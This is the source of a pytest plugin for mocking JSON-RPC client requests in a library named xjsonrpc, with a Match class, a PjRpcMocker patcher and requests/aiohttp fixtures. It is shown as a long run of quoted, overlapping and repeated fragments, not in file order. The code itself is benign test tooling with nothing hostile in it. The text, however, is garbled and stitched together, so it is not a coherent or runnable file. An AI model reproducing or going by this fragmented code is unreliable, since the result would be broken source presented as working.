passthrough: pass not mocked requests to", "None: result = self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return", "is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint,", "same method patch already exists they will be used in a round-robin way.", "None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise ConnectionRefusedError() json_data =", "request matching information. \"\"\" def __init__( self, endpoint: str, version: str, method_name: str,", "response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker. :param target: method to be", "target self._mocker = mocker self._patcher = None self._async_resp = False self._passthrough = passthrough", "exists they will be used in a round-robin way. :param endpoint: request endpoint", "name :param result: patched result :param error: patched error :param id: patched request", "import xjsonrpc from xjsonrpc import Response from xjsonrpc.common import UNSET, UnsetType class Match:", "request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method, request.params, request.id) if self._async_resp: async", "yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture. 
\"\"\" with PjRpcAiohttpMocker()", "= match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'],", "def add( self, endpoint: str, method_name: str, result: UnsetType = UNSET, error: UnsetType", "are more than one) \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result,", "json.dumps(response.to_json()) def _match_request( self, endpoint: str, version: str, method_name: str, params: Optional[Union[list, dict]],", "if self._async_resp: async def side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs) else: def side_effect(*args,", "import pytest import xjsonrpc from xjsonrpc import Response from xjsonrpc.common import UNSET, UnsetType", "self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property def calls(self) ->", "version: str, method_name: str, params: Optional[Union[list, dict]], id: Optional[Union[int, str]], ) -> Response:", "async def wrapper(): return json.dumps(response.to_json()) return wrapper() else: return json.dumps(response.to_json()) def _match_request( self,", "library clients. \"\"\" import asyncio import collections import functools as ft import json", "_cleanup_matches(self, endpoint: str, version: str = '2.0', method_name: Optional[str] = None) -> None:", "if ``True`` the patch will be deleted after the first call :param callback:", "method name :param version: JSON-RPC request version :returns: removed response patch \"\"\" if", "error: UnsetType = UNSET, id: Optional[Union[int, str]] = None, version: str = '2.0',", "Callable, Dict, Optional, Union import pytest import xjsonrpc from xjsonrpc import Response from", "Any): endpoint = origin_self._endpoint matches = self._matches.get(endpoint) if matches is None: if self._passthrough:", "match = matches.pop(0) if not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault(", "call :param callback: patched request callback \"\"\" match = Match(endpoint, version, method_name, once,", "id: Optional[Union[int, str]] = None, version: str = '2.0', once: bool = False,", "reset(self) -> None: \"\"\" Removes all added matches and reset call statistics. \"\"\"", "import collections import functools as ft import json import unittest.mock from typing import", "a new one. 
:param endpoint: request endpoint :param method_name: method name :param result:", "is None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise ConnectionRefusedError() json_data", "matches = self._matches[endpoint].get((version, method_name)) if matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match =", "json.loads(request_text) if isinstance(json_data, (list, tuple)): response = xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append(", "target: method to be mocked :param mocker: mocking package :param passthrough: pass not", ":param method_name: method name :param version: JSON-RPC request version :returns: removed response patch", "if match.callback: if isinstance(params, (list, tuple)): result = match.callback(*params) else: result = match.callback(**params)", "mocked :param mocker: mocking package :param passthrough: pass not mocked requests to the", "callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def remove(self, endpoint: str, method_name: Optional[str] = None,", "endpoint: str, version: str = '2.0', method_name: Optional[str] = None) -> None: matches", "matching information. \"\"\" def __init__( self, endpoint: str, version: str, method_name: str, once:", "version: str = '2.0'): \"\"\" Removes a previously added response patch. :param endpoint:", "passthrough: bool = False): self._target = target self._mocker = mocker self._patcher = None", "id :param version: patched request version :param once: if ``True`` the patch will", ":param mocker: mocking package :param passthrough: pass not mocked requests to the original", "original method \"\"\" def __init__(self, target, mocker=unittest.mock, passthrough: bool = False): self._target =", "method patch already exists they will be used in a round-robin way. :param", "else: return json.dumps(response.to_json()) def _match_request( self, endpoint: str, version: str, method_name: str, params:", "= version self.method_name = method_name self.once = once self.callback = callback self.response_data =", "= False self._passthrough = passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict =", "request.params, request.id), ) else: request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method, request.params,", "add( self, endpoint: str, method_name: str, result: UnsetType = UNSET, error: UnsetType =", "result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def remove(self, endpoint: str, method_name: Optional[str]", "target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture. \"\"\" with PjRpcRequestsMocker() as", "client mocker. 
:param target: method to be mocked :param mocker: mocking package :param", "version self.method_name = method_name self.once = once self.callback = callback self.response_data = response_data", "xjsonrpc from xjsonrpc import Response from xjsonrpc.common import UNSET, UnsetType class Match: \"\"\"", "def __init__(self, target, mocker=unittest.mock, passthrough: bool = False): self._target = target self._mocker =", "unittest.mock from typing import Any, Callable, Dict, Optional, Union import pytest import xjsonrpc", "await self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target,", "**kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self) -> None: \"\"\"", "mocker=unittest.mock, passthrough: bool = False): self._target = target self._mocker = mocker self._patcher =", "self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint: str, method_name: str, result: UnsetType = UNSET,", "= '2.0', method_name: Optional[str] = None) -> None: matches = self._matches[endpoint].get((version, method_name)) if", "method_name is None: result = self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version,", "= ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture. \"\"\" with", "they will be used in a round-robin way. :param endpoint: request endpoint :param", "after the first call :param callback: patched request callback \"\"\" match = Match(endpoint,", "version: JSON-RPC request version :returns: removed response patch \"\"\" if method_name is None:", "self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)): stub(*params) else: stub(**params)", "JSON-RPC request version :returns: removed response patch \"\"\" if method_name is None: result", "passthrough: pass not mocked requests to the original method \"\"\" def __init__(self, target,", "fixture. \"\"\" with PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp", "callback: Optional[Callable], **response_data: Any, ): self.endpoint = endpoint self.version = version self.method_name =", "def stop(self) -> None: \"\"\" Stop an active patcher. \"\"\" self.reset() self._patcher.stop() def", "method_name)) if matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not", "once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def remove(self, endpoint: str,", "\"\"\" Removes a previously added response patch. 
:param endpoint: request endpoint :param method_name:", "= self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self) -> None: \"\"\" Stop an", "None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)): stub(*params) else: stub(**params) if match.callback: if", "tuple)): result = match.callback(*params) else: result = match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return", "matches is None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise ConnectionRefusedError()", "version: str = '2.0', method_name: Optional[str] = None) -> None: matches = self._matches[endpoint].get((version,", "str]], ) -> Response: matches = self._matches[endpoint].get((version, method_name)) if matches is None: return", "match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs:", "self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint) def", "Stop an active patcher. \"\"\" self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str, version: str", "self, endpoint: str, method_name: str, result: UnsetType = UNSET, error: UnsetType = UNSET,", ":param target: method to be mocked :param mocker: mocking package :param passthrough: pass", "= '2.0'): \"\"\" Removes a previously added response patch. :param endpoint: request endpoint", "async def side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs): return", "will be deleted after the first call :param callback: patched request callback \"\"\"", "return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start() return self", "\"\"\" Requests client mocking fixture. \"\"\" with PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture", "stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params,", "calls(self) -> Dict: \"\"\" Dictionary of JSON-PRC method calls. \"\"\" return self._calls def", "xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self):", "\"\"\" `pytest <https://docs.pytest.org/en/latest/>`_ client library integration. Implements some utilities for mocking out ``xjsonrpc``", "= UNSET, id: Optional[Union[int, str]] = None, version: str = '2.0', once: bool", "mocker. :param target: method to be mocked :param mocker: mocking package :param passthrough:", "the same method patch already exists they will be used in a round-robin", "side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs)", "method_name self.once = once self.callback = callback self.response_data = response_data class PjRpcMocker: \"\"\"", "be used in a round-robin way. :param endpoint: request endpoint :param method_name: method", "\"\"\" Match object. 
Incorporates request matching information. \"\"\" def __init__( self, endpoint: str,", "response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id), ) else: request = xjsonrpc.Request.from_json(json_data) response =", ":param method_name: method name :param result: patched result :param error: patched error :param", "PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker. :param target: method to be mocked :param", "self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self) -> None: \"\"\" Stop", "endpoint = origin_self._endpoint matches = self._matches.get(endpoint) if matches is None: if self._passthrough: return", "= xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id), )", "mocker: mocking package :param passthrough: pass not mocked requests to the original method", "= method_name self.once = once self.callback = callback self.response_data = response_data class PjRpcMocker:", "will be used in a round-robin way. :param endpoint: request endpoint :param method_name:", "method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def remove(self, endpoint:", "patched request callback \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error,", "bool = False, callback: Optional[Callable] = None, idx: int = 0, ): \"\"\"", "clients. \"\"\" import asyncio import collections import functools as ft import json import", "self._target = target self._mocker = mocker self._patcher = None self._async_resp = False self._passthrough", "None) if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text: str, is_notification: bool", "return self._patcher.start() def stop(self) -> None: \"\"\" Stop an active patcher. \"\"\" self.reset()", "**kwargs) else: raise ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data, (list, tuple)): response =", "patch. 
If the same method patch already exists they will be used in", "mocking package :param passthrough: pass not mocked requests to the original method \"\"\"", "isinstance(json_data, (list, tuple)): response = xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version,", "*args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)): stub(*params) else: stub(**params) if", "\"\"\" def __init__(self, target, mocker=unittest.mock, passthrough: bool = False): self._target = target self._mocker", "method_name: Optional[str] = None) -> None: matches = self._matches[endpoint].get((version, method_name)) if not matches:", "self, endpoint: str, version: str, method_name: str, once: bool, callback: Optional[Callable], **response_data: Any,", "dict]], id: Optional[Union[int, str]], ) -> Response: matches = self._matches[endpoint].get((version, method_name)) if matches", "Optional[str] = None) -> None: matches = self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version,", "mocked requests to the original method \"\"\" def __init__(self, target, mocker=unittest.mock, passthrough: bool", "= '2.0', once: bool = False, callback: Optional[Callable] = None, ) -> None:", "else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return result def reset(self) ->", "self._patcher.stop() def _cleanup_matches(self, endpoint: str, version: str = '2.0', method_name: Optional[str] = None)", "= True if self._async_resp: async def side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs) else:", "str, method_name: Optional[str] = None, version: str = '2.0'): \"\"\" Removes a previously", "self def __exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker,", "way. :param endpoint: request endpoint :param method_name: method name :param result: patched result", ") -> Response: matches = self._matches[endpoint].get((version, method_name)) if matches is None: return xjsonrpc.Response(id=id,", "id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start() return self def __exit__(self,", "def __enter__(self): self.start() return self def __exit__(self, exc_type, exc_val, exc_tb): self.stop() self.reset() #", "xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method, request.params, request.id) if self._async_resp: async def wrapper():", "result = match.callback(*params) else: result = match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response(", "self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text: str, is_notification: bool = False, **kwargs: Any):", "from xjsonrpc.common import UNSET, UnsetType class Match: \"\"\" Match object. 
Incorporates request matching", "\"\"\" if method_name is None: result = self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name))", "self._async_resp: async def side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs):", "= origin_self._endpoint matches = self._matches.get(endpoint) if matches is None: if self._passthrough: return self._patcher.temp_original(origin_self,", "_match_request( self, endpoint: str, version: str, method_name: str, params: Optional[Union[list, dict]], id: Optional[Union[int,", "new one. :param endpoint: request endpoint :param method_name: method name :param result: patched", "once self.callback = callback self.response_data = response_data class PjRpcMocker: \"\"\" Synchronous JSON-RPC client", "match.callback: if isinstance(params, (list, tuple)): result = match.callback(*params) else: result = match.callback(**params) return", "id: patched request id :param version: patched request version :param once: if ``True``", "result :param error: patched error :param id: patched request id :param version: patched", "asyncio import collections import functools as ft import json import unittest.mock from typing", "endpoint: request endpoint :param method_name: method name :param version: JSON-RPC request version :returns:", "request endpoint :param method_name: method name :param version: JSON-RPC request version :returns: removed", "version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def remove(self,", "for stub in calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates a patcher. \"\"\"", ":param version: patched request version :param once: if ``True`` the patch will be", "match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start() return self def __exit__(self, exc_type, exc_val,", "collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property def calls(self) -> Dict: \"\"\" Dictionary", "version: str, method_name: str, once: bool, callback: Optional[Callable], **response_data: Any, ): self.endpoint =", "(list, tuple)): stub(*params) else: stub(**params) if match.callback: if isinstance(params, (list, tuple)): result =", "patch already exists they will be used in a round-robin way. :param endpoint:", "not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self: Any, request_text: str, is_notification: bool = False,", "UnsetType class Match: \"\"\" Match object. Incorporates request matching information. 
\"\"\" def __init__(", "first call :param callback: patched request callback :param idx: patch index (if there", "self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'),", "self._on_request(*args, **kwargs) self._patcher = self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self) -> None:", "self.reset() # shortcuts PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def", "return self._calls def add( self, endpoint: str, method_name: str, result: UnsetType = UNSET,", "from xjsonrpc import Response from xjsonrpc.common import UNSET, UnsetType class Match: \"\"\" Match", "once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint: str, method_name:", "if isinstance(json_data, (list, tuple)): response = xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint,", "PjRpcRequestsMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.requests.Client._request') PjRpcAiohttpMocker = ft.partial(PjRpcMocker, target='xjsonrpc.client.backend.aiohttp.Client._request') @pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests", "= None, idx: int = 0, ): \"\"\" Replaces a previously added response", "**kwargs: Any): endpoint = origin_self._endpoint matches = self._matches.get(endpoint) if matches is None: if", "tuple)): response = xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params,", "def start(self): \"\"\" Activates a patcher. \"\"\" patcher = self._mocker.patch(self._target) with patcher: if", "request.method, request.params, request.id) if self._async_resp: async def wrapper(): return json.dumps(response.to_json()) return wrapper() else:", "stub(*params) else: stub(**params) if match.callback: if isinstance(params, (list, tuple)): result = match.callback(*params) else:", "-> Response: matches = self._matches[endpoint].get((version, method_name)) if matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name))", "client library integration. Implements some utilities for mocking out ``xjsonrpc`` library clients. 
\"\"\"", "to the original method \"\"\" def __init__(self, target, mocker=unittest.mock, passthrough: bool = False):", "Any, Callable, Dict, Optional, Union import pytest import xjsonrpc from xjsonrpc import Response", "method \"\"\" def __init__(self, target, mocker=unittest.mock, passthrough: bool = False): self._target = target", ":param callback: patched request callback :param idx: patch index (if there are more", "is_notification, **kwargs) else: raise ConnectionRefusedError() json_data = json.loads(request_text) if isinstance(json_data, (list, tuple)): response", "self.endpoint = endpoint self.version = version self.method_name = method_name self.once = once self.callback", "= match.callback(*params) else: result = match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id", "calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates a patcher. \"\"\" patcher = self._mocker.patch(self._target)", "patch. :param endpoint: request endpoint :param method_name: method name :param version: JSON-RPC request", "request id :param version: patched request version :param once: if ``True`` the patch", "one) \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version,", "= self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return result def reset(self) -> None: \"\"\"", "deleted after the first call :param callback: patched request callback :param idx: patch", "def _cleanup_matches(self, endpoint: str, version: str = '2.0', method_name: Optional[str] = None) ->", "will be deleted after the first call :param callback: patched request callback :param", "more than one) \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error,", "Optional[Callable], **response_data: Any, ): self.endpoint = endpoint self.version = version self.method_name = method_name", "else: request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method, request.params, request.id) if self._async_resp:", "callback: Optional[Callable] = None, idx: int = 0, ): \"\"\" Replaces a previously", "else: return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], ) def __enter__(self): self.start() return", "request.id), ) else: request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version, request.method, request.params, request.id)", "method_name: method name :param version: JSON-RPC request version :returns: removed response patch \"\"\"", "match.callback(**params) return xjsonrpc.Response(id=id, result=result) else: return xjsonrpc.Response( id=id or match.response_data['id'], result=match.response_data['result'], error=match.response_data['error'], )", "bool = False): self._target = target self._mocker = mocker self._patcher = None self._async_resp", "information. \"\"\" def __init__( self, endpoint: str, version: str, method_name: str, once: bool,", "by a new one. 
:param endpoint: request endpoint :param method_name: method name :param", "if not match.once: matches.append(match) self._cleanup_matches(endpoint, version, method_name) stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda", "method_name: Optional[str] = None, version: str = '2.0'): \"\"\" Removes a previously added", "0, ): \"\"\" Replaces a previously added response patch by a new one.", "version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self, endpoint:", "for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id), ) else: request", "self._matches[endpoint][(version, method_name)][idx] = match def remove(self, endpoint: str, method_name: Optional[str] = None, version:", "xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id), ) else:", "def remove(self, endpoint: str, method_name: Optional[str] = None, version: str = '2.0'): \"\"\"", "version :returns: removed response patch \"\"\" if method_name is None: result = self._matches.pop(endpoint)", "request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id), ) else: request =", "with PjRpcRequestsMocker() as mocker: yield mocker @pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking", "collections.defaultdict(dict) @property def calls(self) -> Dict: \"\"\" Dictionary of JSON-PRC method calls. \"\"\"", "else: stub(**params) if match.callback: if isinstance(params, (list, tuple)): result = match.callback(*params) else: result", "isinstance(params, (list, tuple)): result = match.callback(*params) else: result = match.callback(**params) return xjsonrpc.Response(id=id, result=result)", "= '2.0', once: bool = False, callback: Optional[Callable] = None, idx: int =", "): \"\"\" Replaces a previously added response patch by a new one. :param", "= Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace(", "True if self._async_resp: async def side_effect(*args, **kwargs): return await self._on_request(*args, **kwargs) else: def", "None: \"\"\" Appends response patch. If the same method patch already exists they", "index (if there are more than one) \"\"\" match = Match(endpoint, version, method_name,", "a previously added response patch. :param endpoint: request endpoint :param method_name: method name", "idx: int = 0, ): \"\"\" Replaces a previously added response patch by", "error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx] = match def remove(self, endpoint: str, method_name: Optional[str] =", "name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)): stub(*params) else: stub(**params) if match.callback: if isinstance(params,", "import unittest.mock from typing import Any, Callable, Dict, Optional, Union import pytest import", "xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture. 
\"\"\" with PjRpcRequestsMocker() as mocker: yield mocker", "self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return result def reset(self)", "): self.endpoint = endpoint self.version = version self.method_name = method_name self.once = once", "self.reset() self._patcher.stop() def _cleanup_matches(self, endpoint: str, version: str = '2.0', method_name: Optional[str] =", "def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture. \"\"\" with PjRpcRequestsMocker() as mocker: yield", "def _match_request( self, endpoint: str, version: str, method_name: str, params: Optional[Union[list, dict]], id:", "version: patched request version :param once: if ``True`` the patch will be deleted", "response patch by a new one. :param endpoint: request endpoint :param method_name: method", "version: str = '2.0', once: bool = False, callback: Optional[Callable] = None, )", "xjsonrpc.common import UNSET, UnsetType class Match: \"\"\" Match object. Incorporates request matching information.", "@pytest.fixture def xjsonrpc_requests_mocker(): \"\"\" Requests client mocking fixture. \"\"\" with PjRpcRequestsMocker() as mocker:", "remove(self, endpoint: str, method_name: Optional[str] = None, version: str = '2.0'): \"\"\" Removes", "method_name: method name :param result: patched result :param error: patched error :param id:", "method_name) stub = self.calls[endpoint].setdefault( (version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if", "\"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)][idx]", "Match object. Incorporates request matching information. \"\"\" def __init__( self, endpoint: str, version:", "'2.0', once: bool = False, callback: Optional[Callable] = None, idx: int = 0,", ":returns: removed response patch \"\"\" if method_name is None: result = self._matches.pop(endpoint) else:", "request_text: str, is_notification: bool = False, **kwargs: Any): endpoint = origin_self._endpoint matches =", "matches is None: return xjsonrpc.Response(id=id, error=xjsonrpc.exc.MethodNotFoundError(data=method_name)) match = matches.pop(0) if not match.once: matches.append(match)", "self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint, version, method_name) return result def reset(self) -> None: \"\"\" Removes", "statistics. \"\"\" self._matches.clear() for calls in self._calls.values(): for stub in calls.values(): stub.reset_mock() self._calls.clear()", "request version :param once: if ``True`` the patch will be deleted after the", "class PjRpcMocker: \"\"\" Synchronous JSON-RPC client mocker. :param target: method to be mocked", "request callback \"\"\" match = Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback)", "endpoint: str, method_name: Optional[str] = None, version: str = '2.0'): \"\"\" Removes a", "the first call :param callback: patched request callback :param idx: patch index (if", "already exists they will be used in a round-robin way. :param endpoint: request", "calls in self._calls.values(): for stub in calls.values(): stub.reset_mock() self._calls.clear() def start(self): \"\"\" Activates", "@pytest.fixture def xjsonrpc_aiohttp_mocker(): \"\"\" Aiohttp client mocking fixture. 
\"\"\" with PjRpcAiohttpMocker() as mocker:", "xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id), ) else: request = xjsonrpc.Request.from_json(json_data) response", "self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise ConnectionRefusedError() json_data = json.loads(request_text) if", "Match(endpoint, version, method_name, once, id=id, result=result, error=error, callback=callback) self._matches[endpoint][(version, method_name)].append(match) def replace( self,", "str = '2.0', once: bool = False, callback: Optional[Callable] = None, ) ->", "if method_name is None: result = self._matches.pop(endpoint) else: result = self._matches[endpoint].pop((version, method_name)) self._cleanup_matches(endpoint,", "= passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls: Dict = collections.defaultdict(dict) @property def", "(version, method_name), self._mocker.MagicMock(spec=lambda *args, **kwargs: None, name=f'{endpoint}:{version}:{method_name}'), ) if isinstance(params, (list, tuple)): stub(*params)", "not mocked requests to the original method \"\"\" def __init__(self, target, mocker=unittest.mock, passthrough:", "idx: patch index (if there are more than one) \"\"\" match = Match(endpoint,", "\"\"\" def __init__( self, endpoint: str, version: str, method_name: str, once: bool, callback:", "None self._async_resp = False self._passthrough = passthrough self._matches: Dict = collections.defaultdict(lambda: collections.defaultdict(list)) self._calls:", "``xjsonrpc`` library clients. \"\"\" import asyncio import collections import functools as ft import", "if not matches: self._matches[endpoint].pop((version, method_name), None) if not self._matches[endpoint]: self._matches.pop(endpoint) def _on_request(self, origin_self:", "reset call statistics. \"\"\" self._matches.clear() for calls in self._calls.values(): for stub in calls.values():", "None: matches = self._matches[endpoint].get((version, method_name)) if not matches: self._matches[endpoint].pop((version, method_name), None) if not", "import Response from xjsonrpc.common import UNSET, UnsetType class Match: \"\"\" Match object. Incorporates", "response = xjsonrpc.BatchResponse() for request in xjsonrpc.BatchRequest.from_json(json_data): response.append( self._match_request(endpoint, request.version, request.method, request.params, request.id),", "Implements some utilities for mocking out ``xjsonrpc`` library clients. \"\"\" import asyncio import", "= False): self._target = target self._mocker = mocker self._patcher = None self._async_resp =", "-> Dict: \"\"\" Dictionary of JSON-PRC method calls. \"\"\" return self._calls def add(", "self._matches.clear() for calls in self._calls.values(): for stub in calls.values(): stub.reset_mock() self._calls.clear() def start(self):", "None, version: str = '2.0'): \"\"\" Removes a previously added response patch. 
:param", "self._mocker.patch(self._target, side_effect=side_effect, autospec=True) return self._patcher.start() def stop(self) -> None: \"\"\" Stop an active", "asyncio.iscoroutinefunction(patcher.temp_original): self._async_resp = True if self._async_resp: async def side_effect(*args, **kwargs): return await self._on_request(*args,", "= endpoint self.version = version self.method_name = method_name self.once = once self.callback =", "request.version, request.method, request.params, request.id), ) else: request = xjsonrpc.Request.from_json(json_data) response = self._match_request(endpoint, request.version,", "if matches is None: if self._passthrough: return self._patcher.temp_original(origin_self, request_text, is_notification, **kwargs) else: raise", "= target self._mocker = mocker self._patcher = None self._async_resp = False self._passthrough =", "some utilities for mocking out ``xjsonrpc`` library clients. \"\"\" import asyncio import collections", "json_data = json.loads(request_text) if isinstance(json_data, (list, tuple)): response = xjsonrpc.BatchResponse() for request in", "If the same method patch already exists they will be used in a", "package :param passthrough: pass not mocked requests to the original method \"\"\" def", "bool = False, callback: Optional[Callable] = None, ) -> None: \"\"\" Appends response", "None, version: str = '2.0', once: bool = False, callback: Optional[Callable] = None,", "self._on_request(*args, **kwargs) else: def side_effect(*args, **kwargs): return self._on_request(*args, **kwargs) 